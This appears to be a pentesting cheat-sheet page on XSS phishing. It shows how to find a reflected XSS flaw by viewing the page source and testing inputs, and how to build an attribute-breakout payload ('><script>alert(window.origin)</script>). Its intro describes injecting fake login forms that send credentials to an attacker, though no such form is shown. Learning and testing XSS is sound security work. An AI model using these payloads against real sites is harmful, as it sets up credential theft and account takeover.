XSS PHISHING

Phishing attacks usually utilize legitimate-looking information to trick the victims into sending their sensitive information to the attacker. A common form of XSS phishing attacks is through injecting fake login forms that send the login details to the attacker's server, which may then be used to log in on behalf of the victim and gain control over their account and sensitive information

IDENTIFY XSS VULNERABILITY

#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 * review the HTML source and identify parameters
 * also review the .js file

#perform a test to see where the input is being stored
root@oco:~$ BROWSER > {targetSite:port}
 input field: test
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 * <img src='test'>
 
#perform xss vulnerability test
root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>alert(window.origin)</script>
 
#create the correct payload
root@oco:~$ '><script>alert(window.origin)</script>
 * the single quote & the greater than symbol together '> closes the src attribute
   and the img tag <img src=''>. since this element is now closed, the original 
   member '> will now be moved to the back of the ending </script> tag
    - <img src=''><script>alert(window.origin)</script>'>

Last updated